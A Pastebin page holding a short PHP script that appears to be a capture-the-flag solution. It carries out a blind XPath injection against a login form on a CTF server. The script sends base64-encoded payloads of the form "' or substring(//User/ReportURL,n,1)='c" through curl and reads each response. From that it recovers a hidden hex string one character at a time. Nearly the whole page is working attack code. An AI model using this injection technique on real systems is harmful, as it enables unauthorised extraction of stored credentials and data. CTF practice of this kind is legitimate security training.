SHARE
TWEET

Untitled

a guest Jul 19th, 2013 348 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. #c0ffee153dbc077ea80f4e697a63ec1e
  3. $context = stream_context_create(array(
  4.     'http' => array('ignore_errors' => true),
  5. ));
  6. $hash="";
  7. for($l=2;$l<=33;$l++){
  8. for($i=97;$i<=102;$i++){
  9.     $inj="' or  substring(//User/ReportURL,".$l.",1)='".chr($i);
  10.     $binj=base64_encode($inj);
  11.     system("curl --silent \"http://dimvactf.0x90.eu:8000/?xml=<login><user>YQ==</user><password>".$binj."</password>\" > ff");
  12.     $a=file_get_contents("ff");
  13.     if(preg_match('/have/',$a)){
  14.         print chr($i).":".$l."\n";
  15.         $hash.=chr($i);
  16.         break;
  17.     }
  18. }
  19. for($i=0;$i<=9;$i++){
  20.     $inj="' or  substring(//User/ReportURL,".$l.",1)='".$i;
  21.     $binj=base64_encode($inj);
  22.     system("curl --silent \"http://dimvactf.0x90.eu:8000/?xml=<login><user>YQ==</user><password>".$binj."</password>\" > ff");
  23.     $a=file_get_contents("ff");
  24.     if(preg_match('/have/',$a)){
  25.         print $i.":".$l."\n";
  26.         $hash.=$i;
  27.         break;
  28.     }
  29. }
  30. }
  31. echo $hash."\n";
  32. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top